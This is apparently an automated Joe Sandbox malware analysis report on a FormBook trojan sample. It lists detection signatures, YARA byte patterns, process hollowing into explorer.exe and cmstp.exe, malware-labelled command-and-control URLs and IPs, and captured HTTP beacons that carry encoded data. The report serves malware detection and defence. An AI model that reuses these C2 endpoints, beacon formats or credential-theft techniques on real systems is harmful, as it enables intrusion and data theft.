Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
u8QPnVhq0N.exe

Overview

General Information

Sample Name:u8QPnVhq0N.exe
Original Sample Name:7de990046a20e6666627273589b014a5.exe
Analysis ID:830804
MD5:7de990046a20e6666627273589b014a5
SHA1:55ebccd35c2329c5816cd0240b0919651ac58321
SHA256:ebce15ad53b98d7aba7f7544ee947e88f58d696e22ca4bc5d15b2ded37b577ac
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • u8QPnVhq0N.exe (PID: 5836 cmdline: C:\Users\user\Desktop\u8QPnVhq0N.exe MD5: 7DE990046A20E6666627273589B014A5)
    • mcwfy.exe (PID: 5952 cmdline: "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f MD5: 6CB712E482D150A185F713D75314A75A)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • mcwfy.exe (PID: 4964 cmdline: C:\Users\user\AppData\Local\Temp\mcwfy.exe MD5: 6CB712E482D150A185F713D75314A75A)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autoconv.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
          • cmstp.exe (PID: 5232 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x20f03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a11a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x19f18:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x199b4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x1a01a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a192:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc83d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18bff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fcaa:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20c5d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.mcwfy.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.mcwfy.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20103:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1931a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.mcwfy.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19118:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18bb4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1921a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19392:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17dff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1eeaa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fe5d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.mcwfy.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.mcwfy.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20f03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a11a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: u8QPnVhq0N.exeReversingLabs: Detection: 46%
          Source: u8QPnVhq0N.exeVirustotal: Detection: 48%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22WmAvira URL Cloud: Label: malware
          Source: http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyAvira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.ukAvira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.comAvira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/www.gritslab.comAvira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/www.white-hat.ukAvira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.comAvira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/www.222ambking.orgAvira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shopAvira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/www.un-object.comAvira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.comAvira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shopAvira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/www.germanreps.comAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/www.younrock.comAvira URL Cloud: Label: malware
          Source: http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pRAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyzAvira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comAvira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comAvira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349pAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeReversingLabs: Detection: 33%
          Machine Learning detection for sample
          Source: u8QPnVhq0N.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeJoe Sandbox ML: detected
          Source: 3.2.mcwfy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.mcwfy.exe.2080000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: u8QPnVhq0N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: u8QPnVhq0N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_004089B8 FindFirstFileExW,

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeDomain query: www.un-object.com
          Source: C:\Windows\explorer.exeDomain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 78.141.192.145 80
          Source: C:\Windows\explorer.exeDomain query: www.white-hat.uk
          Source: C:\Windows\explorer.exeDomain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.12 80
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80
          Source: C:\Windows\explorer.exeDomain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.younrock.com
          Source: C:\Windows\explorer.exeDomain query: www.gritslab.com
          Source: C:\Windows\explorer.exeNetwork Connect: 161.97.163.8 80
          Source: C:\Windows\explorer.exeDomain query: www.222ambking.org
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.149 80
          Source: C:\Windows\explorer.exeDomain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 94.176.104.86 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.145.228.111 80
          Source: C:\Windows\explorer.exeNetwork Connect: 72.14.185.43 80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.shapshit.xyz
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 85.187.128.34 85.187.128.34
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 33 61 51 79 4e 64 34 6c 45 50 44 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR73aQyNd4lEPDvbt5YRg).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 77 48 43 72 70 42 7a 56 71 64 6e 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMIwHCrpBzVqdngPOgw6Q).
